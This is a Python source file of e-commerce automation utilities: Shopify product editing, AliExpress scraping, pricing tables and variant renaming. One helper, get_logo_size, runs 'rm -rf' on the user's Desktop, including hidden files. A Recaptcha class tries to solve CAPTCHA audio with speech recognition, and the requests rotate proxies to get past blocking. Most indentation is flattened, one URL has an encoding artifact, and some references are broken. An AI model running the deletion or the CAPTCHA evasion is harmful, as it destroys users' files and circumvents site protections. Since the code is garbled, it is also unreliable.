if no_return == True:
Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
continue
else:
return Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
else:
redprint("[ensuring] `%s` in `a.text`: %s" % (notInText, notInText in a.text))
redprint("[ensuring] `%s` in `a.url`: %s" % (notInUrl, notInUrl in a.text))
""" if self.new.cookies_label, you're not gonna get it without the cookies, ie you must continue at the end of this if statement """
continue
""" """
magentaprint("[url][%s]" % self.new.w)
proxies = Proxy().get_random_proxy()if(1==proxy)else(None)
processes = []
for i in range(process_count):
def run_once():
if Get(Request,id=self.new.id).y == None:
magentaprint(Get(Request,id=self.new.id).y)
#a = tryreturn(requests.get,self.new.w,timeout=10,headers=session_headers,proxies=proxies,ep=True)
#a = tryreturn(requests.get,self.new.w,timeout=10,headers=session_headers,proxies=proxies,ep=True)
a = None
try:
if "amazon" in self.new.w:
a = requests.get(self.new.w,timeout=10,proxies=proxies,headers=amazon_headers)
else:
a = requests.get(self.new.w,timeout=10,proxies=proxies,headers=session_headers)
except Exception as e:
redprint(e)
time.sleep(10)
print(a)
print(a)
print("going")
if (0!=a) and (-1!=getattr(a,"status_code",-1)) and (notInUrl not in getattr(a,"url",notInUrl)) and (notInText not in getattr(a,"text",notInText)):
if Get(Request,id=self.new.id).y != None:
if no_return == True:
Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
else:
return Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
else:
return run_once()
print("appending process")
processes.append(process_(run_once)if(1==self.process_)else(process(run_once)))
while True:
time.sleep(1/4)
if Get(Request,id=self.new.id).y != None:
magentaprint(Get(Request,id=self.new.id).y)
if self.process_ == True: keycall("terminate",processes)
return Get(Request,id=self.new.id).y
""" if notInUrl set to partial correct url, it will request x/second And Likely 443. """
class Recaptcha:
def __init__(self):
# Attempt No.1
os.system("brew install pocketsphinx")
os.system("brew install ffmpeg")
os.system("pip install moviepy")
os.system("pip install gtts")
OSA.display_dialog("Download the audio from the recaptcha.", text_prompt = False)
os.remove("audio.mp3")
os.remove("audio.wav")
os.system("mv ~/Downloads/audio.mp3 audio.mp3")
Slime().mp3_to_wav("audio.mp3", "audio.wav")
a = Speech_Recognition().recognize_sphinx("audio.wav")
b = Speech_Recognition().recognize_google("audio.wav")
c = Speech_Recognition().recognize_google_cloud("audio.wav")
print(a, b, c)
""" Business-Utils-Product-Utils """
def adjustvariantname(x):
x = x.title()
x = re_found_function(x,"(?i)X{6}l",lambda i:re_substitute(i,["(?i)X{6}l","6XL"]))
x = re_found_function(x,"(?i)X{5}l",lambda i:re_substitute(i,["(?i)X{5}l","5XL"]))
x = re_found_function(x,"(?i)X{4}l",lambda i:re_substitute(i,["(?i)X{4}l","4XL"]))
x = re_found_function(x,"(?i)X{3}l",lambda i:re_substitute(i,["(?i)X{3}l","3XL"]))
x = re_found_function(x,"(?i)X{2}l",lambda i:re_substitute(i,["(?i)X{2}l","2XL"]))
x = re_found_function(x,"(?i)^Xl$",lambda i:re_substitute(i,["(?i)^Xl$","XL"]))
x = re_found_function(x,"(?i)^Xs$",lambda i:re_substitute(i,["(?i)^Xs$","XS"]))
x = re_found_function(x,"(?i)^Xxs$",lambda i:re_substitute(i,["(?i)^Xxs$","XXS"]))
x = re_found_function(x,"(?i)^\d+Xl",lambda i:re_substitute(i,["(?i)(^\d+)Xl","\\1XL"]))
x = re_found_function(x,"(?i)^\d+Xs",lambda i:re_substitute(i,["(?i)(^\d+)Xs","\\1XS","\\1XS"]))
x = re_found_function(x,"(?i)\d+in",lambda i:re_substitute(i,["(?i)(\d+)in","\\1in"]))
x = re_found_function(x,"(?i)\d+cm",lambda i:re_substitute(i,["(?i)(\d+)cm","\\1cm"]))
x = re_found_function(x,"(?i)^asian",lambda i:re_substitute(i,["(?i)^asian",""]).strip())
# x = re_found_function(x,"(?i)cm",lambda i:re_substitute(re_substitute_function(i,"[\d\.]+",lambda i:or_list(lambda:list_and(lambda:str(round(flt(i)/2.54,1)).endswith(".0"),lambda:str(int(round(flt(i)/2.54,1)))),lambda:str(round(flt(i)/2.54,1)))),["(?i)cm","in"]) )
x = re_found_function(x,"(?i)^For",lambda i:re_substitute(i,["(?i)^For",""]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)iPhone","iPhone"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Xs","XS"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Xr","XR"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Se","SE"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Xsmax","XS Max"]).strip())
x = re_found_function(x,"(?i)Style",lambda i:i)
x = re_found_function(x," {2,}",lambda i:re_substitute(i,[" {2,}"," "]))
x = re_found_function(x,"(?i)eu size",lambda i:re_substitute(i,["(?i)eu size",""]).strip())
x = re_found_function(x,"(?i)^Size[- ]",lambda i:re_substitute(i,["(?i)^Size[- ]",""]).strip())
x = re_found_function(x,"(?i)(^A\d+)",lambda i:re_substitute(i,["(?i)(^A\d+)","Samsung \\1"]).strip())
x = re_found_function(x,"(?i)(^J\d+)",lambda i:re_substitute(i,["(?i)(^J\d+)","Samsung \\1"]).strip())
x = re_found_function(x,"(?i)(^P\d+)",lambda i:re_substitute(i,["(?i)(^P\d+)","Huawei \\1"]).strip())
x = re_found_function(x,"(?i)^Galaxy",lambda i:re_substitute(re_substitute(i,["(?i)^Galaxy","Samsung Galaxy"]),["Samsung Galaxy","Samsung"]).strip())
x = re_found_function(x,"(?i)(^P Smart)",lambda i:re_substitute(i,["(?i)(^P Smart)","Huawei \\1"]).strip())
x = re_found_function(x,"(?i)(\d+)Xl",lambda i:re_substitute(i,["(?i)(\d+)Xl","\\1XL"]).strip())
x = re_found_function(x,"(?i)((?:^Xl$|^Xs$))",lambda i:re_substitute(i,["(?i)((?:^Xl$|^Xs$))","\\1"]).upper())
return x
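"""
Examples (sketch, assuming re_found_function / re_substitute apply the listed
substitution only when the pattern matches):
adjustvariantname("xxxl") -> "3XL"
adjustvariantname("asian size m") -> "M"
"""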
def address_string_from_dict(x):
return ifelseget(lambda:x.get("address2"),lambda:"{first_name} {last_name}, {address1}, {address2}, {city}, {province_code} {zip} {country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() for a,b in x.items()}),lambda:"{first_name} {last_name}, {address1}, {city}, {province_code} {zip} {country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() for a,b in x.items()}))
def address_string_from_dict_2(x):
return ifelseget(lambda:x.get("Card Address Line2"),lambda:"{Card Name}, {Card Address Line1}, {Card Address Line2}, {Card Address City}, {Card Address State} {Card Address Zip} {Card Address Country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() if a != "Card Address Country" else country_code_dict[b] for a,b in x.items()}),lambda:"{Card Name}, {Card Address Line1}, {Card Address City}, {Card Address State} {Card Address Zip} {Card Address Country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() if a != "Card Address Country" else country_code_dict[b] for a,b in x.items()}))
def affix_option_names(p, shop):
p = shop.shopify.Product.find(id_=p.id)
data = {}
for i in p.options:
i = i.to_dict()
data[i["name"]] = i["values"]
print(i["name"], i["values"])
to_make_changes = input("to_make_changes to variant names (y/n): ")
#to_make_changes = "n"
if to_make_changes == "n":
print("Finished creating all variant changes")
return
changes = {}
while True:
x = input("q\old->new eg- 'XXL->2XL' : ")
if x=="q":break
old, new = x.split("->")
changes[old] = new
print("changes:\n%s\n"%changes)
for i in p.variants:
changed = False
for old,new in changes.items():
try:
if i.option1 == old:
i.option1 = new
changed = True
except : pass
try:
if i.option2 == old:
i.option2 = new
changed = True
except : pass
try:
if i.option3 == old:
i.option3 = new
changed = True
except : pass
if changed == True:
print("changed, saving")
i.save()
p = shop.shopify.Product.find(id_=p.id)
print("[Reminder] if you want to directly delete an option; as far as i know how, you would do it thru the browser")
return affix_option_names(p, shop)
def affix_product_descriptions():
#for shop in Shop.objects.filter(shop_abbreviation="aws"):
for shop in Shop.objects.all()[:1]:
shop = Shop()( shop.shop_abbreviation)
products = [i for i in getshopifyproducts(shop) if len(Product.objects.filter(id=i.id)) > 0]
products = [i for i in products if Product.objects.get(id=i.id).description!=None]
for idx,p in enum(products):
#p = affix_product_title(p)
#distinct_print(describe_product(p))
zz(0.5)
try:
Shop()(shop.shop_abbreviation)
distinct_print(describe_product(p)[:25])
except Exception as e:
redprint("[%s][%s][affix_product_descriptions]"%(idx,e))
def append_pictures():
workmode = None
if Muta()().sciencevessels_on:
x = list(All(ScienceVessel))[-1]
y = {"index":None, "urls":None}
io = OSA.log("Enter in a number to specify the image (usually 0 or -1) and then the urls. Delimit with ', '").split(", ")
index = int(io[0])
urls = io[1:]
y["index"] = io
y["urls"] = urls
x.append_pictures = url
x.save()
else:
io = OSA.log("Enter in a number to specify the image (usually 0 or -1) and then the urls. Delimit with ', '").split(", ")
product = list(All(Product))[-1]
index = int(io[0])
if index < 0:
index = len(product.images) + index + 1
urls = io[1:]
product_ = Shop()(product.shop).pfind(id_=product.id)
images = lmap(lambda i: {"attachment": i}, pool(lambda i: Images().image_base64(i), pool(Images().sharpen, pool(Images().download, urls).result()).result()).result())
product_.images = product_.images[:index] + images + product_.images[index:]
product_.save()
def create_navigation_menu_items(shop, menu_name, menu_items):
shop.Login_Shopify_Store()
globals().update(g.__globals__)
ss.get("{}/menus".format(shop.Administrative_Url))
for i in ss.fcns("next-table__cell--full-width-when-condensed"):
if i.text == menu_name:
ss.get(ss.fxsxs(i)[0].get_attribute("href"))
x = []
for idx, i in enum(menu_items):
print("idx: %s, total: %s" % ((idx+1), len(menu_items)))
ss.fcn("menu__add-menu-item").click().sp(3)
ss.fid("addMenuItemLink").send_keys(i).sp(3)
ss.tp(lambda: ss.jtns("a","click",{"data-bind-event-click":'itemSelected(event, "collection")'},_time=2)).sp(2)
if tryprocess(lambda: ss.fcns("next-list__item--disabled",_time=2)[0].text.split("result")[0].strip()) == 1:
if 1 != int(ss.fcns("next-list__item--disabled",_time=4)[0].text.split("result")[0].strip()):
x.append(i)
ss.fid("addMenuItemLink").send_keys(ss.Keys.ARROW_DOWN).sp(3)
ss.fid("addMenuItemLink").send_keys(ss.Keys.ARROW_DOWN).sp(3)
ss.fid("addMenuItemLink").send_keys(ss.Keys.ENTER).sp(4)
ss.ffst("button","Add").click().sp(5)
ss.ffs("button","aria-label","Save").click().sp(7)
def delete_product_images(shop_abbreviation, id_):
shop = Shop()( shop_abbreviation)
p = shop.shopify.Product.find(id_=id_)
images = input("Images delimited by ',' ie 2,4,5,6 : ")
images_numbers = list(map(int, images.split(",")))
previous_image_count = len(p.images)
print("previous image count: %s" % previous_image_count)
for i in images_numbers:
p.images[i].destroy()
p = shop.shopify.Product.find(id_=id_)
new_image_count = len(p.images)
print("new image count: %s" % new_image_count)
deleted_count = previous_image_count - new_image_count
print("deleted count: %s" % deleted_count)
return None
def describe_product(p):
if type(p) == Product: p = Shop()( p.shop).shopify.Product.find(id_=p.id)
i = Product.objects.get(id=p.id)
description = i.description
shop = Shop()( Product.objects.get(id=p.id).shop)
get_size_chart = lambda product_type: Sizechart.objects.get(product_type=product_type).size_chart
#if p.image == None: return "product image was None"
#if p.image.alt == None: return "product image alt was None"
x = ((( (( description if description != None else """""" )) + (( "<p></p>" )) ))) + \
((( (( shop.product_page_general_information )) + (( "<p></p>" )) )))
if i.size_chart != None and i.is_available() and i.product_type in SIZE_CHART_PRODUCT_TYPES and i.shop != None:
if i.is_unavailable():
""
elif i.size_chart == "Unmatched":
"None/Text in <p>/Redo"
else:
size_chart_string_size_chart = ""
if i.size_chart[0].startswith("http"):
if len(i.size_chart) == 1:
for b in i.size_chart:
size_chart_string_size_chart += """<img src="{}" alt="Size Chart" />""".format(b)
elif len(i.size_chart) > 1:
for b in i.size_chart[-1:]:
size_chart_string_size_chart += """<img src="{}" alt="Size Chart" />""".format(b)
elif not i.size_chart[0].startswith("http"):
if len(i.size_chart) == 1:
for b in i.size_chart[-1:]:
size_chart_string_size_chart += b
size_chart_string_size_chart += "<br />"
elif len(i.size_chart) > 1:
for b in i.size_chart:
size_chart_string_size_chart += b
size_chart_string_size_chart += "<br />"
size_chart_string = """<p><strong>Size Chart*<br />{}<br /></strong>*This size chart is specifically for this item.</p>""".format(size_chart_string_size_chart)
#distinct_print(size_chart_string)
x = re.sub(r"(<p.*?<table.*</table>)", "<br /><br />%s"%size_chart_string, x)
try:
if p.image == None: p.destroy(); return
except Exception as e:
print(e)
x = x.replace("\xa0", "").replace("\n", "<br />")
# x is the description you should be creating.
# if database product's body_html is not x... then save.
# so if `i`.body_html != x:
if i.body_html != x:
i.body_html = x; i.save()
p.body_html = x
assert p.save() == True
distinct_print("[different body html][saving][%s]" % p.id)
else:
distinct_print("[same body_html][not saving][%s]"%p.id, end="")
return x
def delete_product(x):
if type(x) == int: x = Get(Product,id=x)
tp(lambda:Del(Get(GhostProduct,id=x.id)))
pool(lambda:[apilimitcall(lambda:x.p().destroy()),print(apilimitcall(lambda:Shop()(x.shop).pfind(handle=x.handle)))])
print("deleting product")
tp(lambda:Del(x))
def generate_price_list():
v={0:9.95,1: 9.95,2: 9.95,3: 9.95,4: 9.95,5: 12.99,6: 12.99,7: 14.99,8: 17.99,9: 17.99,10: 18,11: 22,12: 23,13: 23,14: 29.99,15: 29.99,16: 34,17: 38,18: 40,19: 40,20: 42,21: 42,22: 45,23: 49,24: 50,25: 54,26: 55,27: 59,28: 60,29: 60,30: 61,31: 62,32: 63,33: 64,34: 68,35: 70,36: 71,37: 71,38: 75,39: 80,40: 82,41: 85,42: 85,43: 85,44: 88,45: 90,46: 90,47: 100,48: 100,49: 100,50: 100}
v={0:9.99,1: 9.99,2: 9.99,3: 9.99,4: 12.99,5: 12.99,6: 12.99,7: 17.99,8: 17.99,9: 17.99,10: 17.99,11: 24.99,12: 24.99,13: 24.99,14: 24.99,15: 29.99,16: 38,17: 39,18: 40,19: 40,20: 42,21: 42,22: 45,23: 49,24: 50,25: 54,26: 55,27: 59,28: 60, 29: 60,30: 61,31: 62,32: 63,33: 64,34: 68,35: 70,36: 71,37: 71,38: 75,39: 80,40: 82,41: 85,42: 85,43: 85,44: 88,45: 90,46: 90,47: 100,48: 100,49: 100,50: 100}
ne={}
for i in lrange(5000):
q = i/100
#print(q)
try:
low, high = [i for i in v if i < q][-1], [i for i in v if i > q][0]
print(low,q,high)
assert low < q < high
ne[float(q)] = v[high]
print(q,v[high])
except:
print(q)
return ne
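"""
Example (sketch): the second `v` table above overrides the first; a cost of 7.50
falls between the 7 and 8 brackets, so generate_price_list()[7.50] == 17.99.
"""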
def get_added_product_urls(x):
products_sent = x
products = []
for i in products_sent:
x = Filter(Product,title=i.title)
products.extend(x)
urls = []
for i in products:
x = get_product_url(i)
urls.append(x)
urls = oset(urls)
for i in products:
print(Filter(Product,title=i.title))
print(Filter(GhostProduct,title=i.title))
return urls
def get_all_products_all_shops_created_at_time(x):
return sum([Shop()(i.shop_abbreviation).pfind(created_at_min=x) for i in Shop.objects.all()],[])
def get_all_custom_collections(shop):
return flatten(lmap(lambda i: Shop()(shop).shopify.CustomCollection.find(status="any",limit=250,page=i+1),list(range(int(Shop()(shop).shopify.CustomCollection.count()/250)+1))),1)
def get_handle_from_title(x):
return re.sub(r"[-]+","-",re.sub(r" ","-","".join(re.findall(r"[0-9a-zA-Z ]",x)).lower()))
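"""
Example (sketch): get_handle_from_title("Blue T-Shirt (2XL)!") -> "blue-tshirt-2xl"
(characters other than letters, digits and spaces are dropped, spaces become hyphens,
and runs of hyphens collapse to one).
"""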
def get_logo_size():
import cv2
system("rm -rf ~/Desktop/.* &>/dev/null")
x = lmap(lambda i:int(i),list(cv2.imread(homepath("~/Desktop/%s"%os.listdir(homepath("~/Desktop"))[0])).shape)[:2] )
# x = lmap(lambda i:int(i/2),list(cv2.imread(homepath("~/Desktop/%s"%os.listdir(homepath("~/Desktop"))[0])).shape)[:2] )
system("rm -rf ~/Desktop/* &>/dev/null")
return x
def get_product_video(r):
ss = Browser()("ch+")
try:
ss.get(r,timeout=10)
except Exception as e:
redprint(e)
OSA.notify(str(e))
return get_product_video(r)
url = ss.ftn("video",2).get_attribute("src")
ss.quit()
return url
def getshopifyproducts(shop,**kwargs):
if type(shop) is str: shop = Shop()( shop)
products = sum([shop.shopify.Product.find(status='any',limit=250,page=pg,**kwargs) for pg in range(1,(ceil(shop.shopify.Product.count()/250)+1))],[])
return products
def handle_captcha(url):
captcha = OSA.log("Handle captcha", tp = False)
return captcha
def handle_security_page(ss):
if "sec.aliexpress.com" in ss.current_url:
captcha = handle_captcha(ss.current_url)  # `url` was undefined here; pass the page the browser is currently on
ss.fid("checkcodeInput").send_keys(captcha.get("text"))
ss.ffs("div","class","submit").click()
time.sleep(5)
handle_security_page(ss)
else:
redprint("ok")
return
def productsFeed(shop, created_at_min = 365 * 4 ) :
shop=((Shop()(shop))if(type(shop)==str)else(shop))
"""
shop = a_shop()
created_at_min = 365
"""
product_count = shop.shopify.Product.count()
kwargs = dict( status="any" , created_at_min = datetime.now()-timedelta(days=created_at_min) , limit=250 )
# the old chained conditional expression only ever collected page 1; loop over the pages explicitly
pages = ceil(product_count / 250)
products = []
for page in range(1, min(pages, 10) + 1):
redprint(str(page))
for x in apilimitcall(lambda p=page: shop.pfind(page=p, **kwargs)):
products.append(AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}))
total_updated = 0
globalise(0,"errors")
for x in products:
if x.id in sud("id",All(Product)):
try:Get(Product,id=x.id).feed(x)
except Exception as e:[print(e),globalise(globe("errors")+1,"errors")]
InceptedProduct().handle_update(x)
total_updated += 1
else:
blueprint("skipping id: %s" % (x.id))
OSA.notify("ProductsFeed total updated: %s" % (total_updated))
OSA.notify("ProductsFeed errors: %s" % (errors))
return products
def productsFeedNonDicts(shop):
products = sum([shop.shopify.Product.find(status='any',limit=250, page=pg) for pg in range(1,10)],[])
return products
def proper_title_input(store_abbre):
title = input("title? (this will return a redirect url as well): ")
existing_titles = Shop()( store_abbre).shopify.Product.find(title=title)
if len(existing_titles) > 0:
print("title exists, ")
return proper_title_input(store_abbre)
else:
print("%s not existing in %s" % (title, store_abbre))
# ok
shop = Shop()(store_abbre)
desired_path = redinput("desired path? (/x-y-z): ")
path = automatically_generated_handle = "/" + "".join(re.findall(r"[0-9a-zA-Z ]",title)).lower().replace(" ","-").replace("--","-").replace("--","-")
target = automatically_generated_target = shop.Domain_Name + "/products" + automatically_generated_handle
x = create_redirect(shop, desired_path, automatically_generated_target)
redirect_url = x
return [title, redirect_url]
def remove_extra_note_error_in_image_alt(product):
# note images need to save individually
i = product
if i.image == None:return
if i.image.alt != None and "Note" in i.image.alt:
i.image.alt = re.sub("Note.*","",i.image.alt)
print(i.image.alt)
i.image.save()
time.sleep(0.5)
for j in i.images:
if j.alt != None and "Note" in j.alt:
j.alt = re.sub("Note.*","",j.alt)
j.save()
time.sleep(0.5)
print(j.alt)
def rename_product_variants(shop_abbreviation, id_):
p = Shop()(shop_abbreviation).shopify.Product.find(id_=id_)
rename_dict = {}
while True:
x = input("q\old->new: ")
if x == "q":
break
old, new = x.split("->")
rename_dict[old] = new
changed_data = []
for v in p.variants:
for old in rename_dict:
changed = False
if v.option1 == old:
v.option1 = rename_dict[old]
changed = True
changed_data.append("Hello; changed %s to %s" % (old, rename_dict[old]))
if v.option2 == old:
v.option2 = rename_dict[old]
changed = True
changed_data.append("Hello; changed %s to %s" % (old, rename_dict[old]))
if v.option3 == old:
v.option3 = rename_dict[old]
changed = True
changed_data.append("Hello; changed %s to %s" % (old, rename_dict[old]))
if changed == True:
v.save()
print("\n".join(changed_data))
def republish_product(p):
p.published_at = datetime.now().strftime("%Y-%m-%dT%H:%M:%S-04:00")
assert(True==p.save())
redprint("set [%s][%s][published_at][%s]"%(p.id,p.handle,p.published_at))
return p
def save_and_return(x):
if type(x) != shopify.product.Product:
x = shopify.product.Product(x)
distinct_print("[saving product] .. [%s]"%x.save())
return x
def sort_variants(x):
option1s = oset(sud("option1",x))
'''exec("""print(str(x).replace("},","},\\n"))""")'''
print(option1s)
new_list = []
for option in option1s:
for i in x:
if i["option1"] == option:
new_list.append(i)
option2s = oset(sud("option2",new_list))
'''exec("""print(str(new_list).replace("},","},\\n"))""")'''
print(option2s)
new_list_ = []
for option in option1s:
for option_ in option2s:
for i in new_list:
if i["option1"] == option:
if i["option2"] == option_:
new_list_.append(i)
if "option3" not in new_list_[0].keys():
'''exec("""print(str(new_list_).replace("},","},\\n"))""")'''
return new_list_
else:
option3s = oset(sud("option3",new_list))
'''exec("""print(str(new_list_).replace("},","},\\n"))""")'''
print(option3s)
new_list__ = []
for option in option1s:
for option_ in option2s:
for option__ in option3s:
for i in new_list_:
if i["option1"] == option:
if i["option2"] == option_:
if i["option3"] == option__:
new_list__.append(i)
'''exec("""print(str(new_list__).replace("},","},\\n"))""")'''
return new_list__
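"""
Usage note (sketch, assuming oset/sud preserve first-seen order): sort_variants takes
a list of variant dicts and regroups them so rows sharing the same option1 value come
first, ordered by option2 (and option3 when present), rather than sorting alphabetically.
"""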
def txt_to_dictlist(txt, headers):
data = txt.split("\n\n")
payload = []
for a in data:
x = OrderedDict()
for b, c in zip(a.split("\n"), headers):
x[c] = b
payload.append(x)
return payload
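"""
Example (sketch): txt_to_dictlist("Red\n9.99\n\nBlue\n12.99", ["color", "price"])
-> [OrderedDict([("color", "Red"), ("price", "9.99")]),
    OrderedDict([("color", "Blue"), ("price", "12.99")])]
"""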
def unpublish_product(p):
p.published_at = None
assert(True==p.save())
redprint("set [%s][%s][published_at][%s]"%(p.id,p.handle,None))
return p
def unsplash_download(v):
os.makedirs(homepath("~/Documents/%s"%v), exist_ok=True)
setitem(globals(),"idx",0)
address_url_dict = {}
results = [[setitem(globals(),"fn", homepath("~/Documents/%s/%s_%s.png"%(v,str(globals()["idx"]).zfill(3),v)) ),tryprocess(Images().download,x,fn),redprint(fn),setitem(address_url_dict,fn,x),setitem(globals(),"idx",globals()["idx"]+1),] for x in [x["urls"]["regular"] for x in sum([json.loads(requests.get("https://unsplash.com/napi/search/photos?query=%s&xp=&per_page=20&page=%s"%(v.replace(" ","+"),i)).text)["results"] for i in range(1,1+ceil(int(re.findall(r"([0-9]+) free .*? pictures", requests.get("https://unsplash.com/search/photos/{}".format(v.replace(" ","+"))).text)[0])/20))[:50]], [])]]
json.dump(address_url_dict, open(homepath("~/Documents/%s/address_url_dict.json"%v), "w"))
class Aliexpress_Products:
def __init__(self):
self.rq = Aliexpress_Requests()()
def get_product_data(self, url,check_for_epacket=False):
x = AD(data = None, shipping = None, y = None)
count_of_soups = Filter(Soup,url=url).len()
time_elapsed = or_list(lambda: (Date().Now()-Get(Soup,url=url).last_check).total_seconds(), None)
TO_REFRESH_SOUP = False
assert count_of_soups > 0
if time_elapsed is not None and time_elapsed > (86400*2):
TO_REFRESH_SOUP = True
if TO_REFRESH_SOUP == True:
Push(Soup,url=url)(page_source=self.rq.get(url).text,is_available=True,last_check=Date().Now())
soup = SOUP(Get(Soup,url=url).page_source)
if not soup.text and TO_REFRESH_SOUP == False:
print("Not Found")
x.data = str(soup)
x.y = "Not Found"
return x
item_not_found = None
if len(soup.findAll("div",attrs={"class":"item-not-found-title"})):
item_not_found = True
if "Page Not Found" in soup.findAll("title")[0].text:
item_not_found = True
aliexpressvendor = or_list(tryreturn(lambda:"https:%s" % list(soup.findAll("span",attrs={"class":"shop-name"})[0])[1].attrs["href"]) , tryreturn(lambda:"https:%s" % list(soup.findAll("span",attrs={"class":"shop-name"})[0])[0].findAll("a")[0].attrs["href"]) , tryreturn(lambda:"https://aliexpress.com/store/%s"%(findall(Get(Soup,url=url).page_source,1,'(?s)window.runParams.*"storeNum":(\d+)'))) , None)
if item_not_found:
x.y = "Not Found"
if aliexpressvendor == None:
x.y = "Not Found"
shipping = None
if x.y != "Not Found":
shipping = json.loads(findall(requests.get("https://freight.aliexpress.com/ajaxFreightCalculateService.htm?&f=d&productid={}¤cyCode=USD&transactionCurrencyCode=USD&sendGoodsCountry=&country=US&province=&city=&abVersion=1".format(int(findall(findall(Get(Soup,url=url).page_source,1,'(?s)window.runParams.*productIds: "(.*?)"'),1,".*?(\d+)")))).text,1,"{.*}"))["freight"]
if check_for_epacket:
if "ePacket" not in key("companyDisplayName",shipping):
x.y = "No ePacket"
x.data = str(soup)
x.shipping = shipping
return x
class Posts:
def start(self,shop):
products = Filter(Product,shop=shop)
for i in products:
create_directories(i.shop,i.product_type,i.handle)
os.chdir("/".join([i.shop,i.product_type,i.handle]))
self.run(int(findall(i.ali_url,1,"(\d+)\.html")))
os.chdir("/".join([".."]*3))
    def run(self,product_id):
        x = []
        url = "https://feedback.aliexpress.com/display/productEvaluation.htm"
        data = {'companyId':'','currentPage':'1','evaSortValue':'sortdefault@feedback','evaStarFilterValue':'all Stars','i18n':'true','isOpened':'true','jumpToTop':'false','memberType':'seller','onlyFromMyCountry':'false','ownerMemberId':'229975677','page':'1','productId':'32924594152','startValidDate':'','translate':' Y ','v':'2','version':'','withAdditionalFeedback':'false','withPersonalInfo':'false','withPictures':'true'}
        headers = {'accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','accept-encoding':'gzip, deflate, br','accept-language':'en-US,en;q=0.9','authority':'feedback.aliexpress.com','cache-control':'max-age=0','content-length':'334','content-type':'application/x-www-form-urlencoded','method':'POST','origin':'https://feedback.aliexpress.com','path':'/display/productEvaluation.htm','referer':'https://feedback.aliexpress.com/display/productEvaluation.htm','scheme':'https','upgrade-insecure-requests':'1','user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}
        data["productId"] = str(product_id)
        page_number = 1
        # Walk the review pages until the pager no longer lists a next page.
        while True:
            data['page'] = str(page_number)
            r = requests.post(url,headers=headers,data=data)
            images = BeautifulSoup(r.text).findAll("img")
            page_numbers = listminus(lmap(lambda i:tryreturn(lambda:int(i)),sud("text",BeautifulSoup(r.text).findAll("a",attrs={"class":"ui-goto-page"}))),0)
            x.append(images)
            if page_number+1 not in page_numbers:
                break
            page_number = page_number + 1
        pool(lambda idx,i:Images().download(i,"%s.jpg"%(idx)),lrange(len(flatten(x,1))),lmap(lambda i:i.attrs["src"],flatten(x,1))).result()
        print("+1, %s" % (len(flatten(x,1))))
class ProductTroubleshoot:
def remove_int_handles(self,shop):
x=getshopifyproducts(shop)
for i in x:
y = i.handle[-1]
            if tryprocess(lambda: int(y)):
i.destroy()
def migrate_shop_add_new_shop_object(self):
shops = All(Shop)[2:]
uniq = ["id","shop_abbreviation"]
s = All(Shop)[0]
for shop in shops:
for field in Shop._meta.fields:
if field.name not in uniq:
setattr(shop,field.name,getattr(s,field.name))
print(field.name,getattr(s,field.name))
shop.save()
def update_shops(self,shop1,shop2):
Filter(AceInTheHole,shop=shop1).update(shop=shop2) #
Filter(AceInTheHoleHeaderColumns,shop=shop1).update(shop=shop2) #
Filter(AddProduct,shop=shop1).update(shop=shop2) #
Filter(Adset,shop_abbreviation=shop1).update(shop_abbreviation=shop2)
Filter(Adsethourlyinsightdata,shop_abbreviation=shop1).update(shop_abbreviation=shop2)
Filter(Aliexpress_Dispute,shop=shop1).update(shop=shop2)
Filter(Aliexpress_Dispute,store=shop1).update(store=shop2)
Filter(Aliexpressorder_event,shop=shop1).update(shop=shop2)
Filter(Aliexpressorder_update,shop=shop1).update(shop=shop2)
Filter(ApprovedTransaction,shop=shop1).update(shop=shop2) #
Filter(GhostProduct,shop=shop1).update(shop=shop2)
Filter(GhostProductUpdate,shop=shop1).update(shop=shop2)
Filter(Handle,shop=shop1).update(shop=shop2)
Filter(InceptedProduct,shop=shop1).update(shop=shop2)
Filter(Keep_Exchange,shop=shop1).update(shop=shop2) #
Filter(Lineitem,shop=shop1).update(shop=shop2)
Filter(LineitemsFeed,shop=shop1).update(shop=shop2)
Filter(Muta,current_shop=shop1).update(current_shop=shop2) #
Filter(Muta,store_abbre=shop1).update(store_abbre=shop2) #
Filter(New_Email,shop=shop1).update(shop=shop2)
Filter(New_Email_Template,shop=shop1).update(shop=shop2)
Filter(Order,shop=shop1).update(shop=shop2)
Filter(Payment,shop=shop1).update(shop=shop2)
Filter(Payout,shop=shop1).update(shop=shop2)
Filter(PriceChange,shop=shop1).update(shop=shop2) #
Filter(Product,shop=shop1).update(shop=shop2)
Filter(ProductsFeed,shop=shop1).update(shop=shop2)
Filter(ProductTalk,shop=shop1).update(shop=shop2)
Filter(ReOrder,shop=shop1).update(shop=shop2)
Filter(ScienceVessel,shop=shop1).update(shop=shop2)
Filter(Settlement,shop=shop1).update(shop=shop2)
Filter(StatusVerification,shop=shop1).update(shop=shop2)
Filter(Subscription,shop=shop1).update(shop=shop2)
Filter(TertiaryAction,shop=shop1).update(shop=shop2)
Filter(TertiaryAction_Template,shop=shop1).update(shop=shop2)
Filter(UniqueProductIdentifier,shop=shop1).update(shop=shop2)
class ShippingCost:
def get_shipping_cost(self,x,shop):
sorted_companies_list = ifelseget(lambda:Shop()(shop).Allow_Additional_Shipping_Methods,lambda:["SunYou Economic Air Mail","Yanwen Economic Air Mail","China Air Post","China Post Registered Air Mail","ePacket","AliExpress Standard Shipping"],lambda:["ePacket"])
